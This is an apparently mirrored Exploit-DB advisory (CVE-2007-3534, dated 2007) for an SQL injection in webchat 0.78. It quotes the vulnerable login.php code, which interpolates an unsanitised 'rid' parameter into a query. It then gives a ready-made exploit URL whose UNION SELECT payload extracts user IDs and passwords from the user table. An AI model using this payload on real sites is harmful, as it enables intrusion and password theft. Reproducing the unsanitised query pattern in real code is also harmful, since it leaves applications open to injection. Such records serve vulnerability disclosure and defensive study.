- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4125
- Проверка EDB
-
- Пройдено
- Автор
- R00T
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3534
- Дата публикации
- 2007-06-28
Код:
#########################################################################
#
# [webchat 0.78]
#
# Class: SQL Injection
# Published 28/06/2007
# Remote: Yes
# Critical Level : Dangerous
# Site: http://sourceforge.net/projects/webdev-webchat/
# Download: http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author: r00t
#########################################################################
Vulnerable code:
login.php
======================================================
<?
$q = new DB_Chat;
$q->query("select * from room where rid='$rid'");
if ($q->next_record()) {
?>
=======================================================
Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================
Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================
# milw0rm.com [2007-06-28]- Источник
- www.exploit-db.com
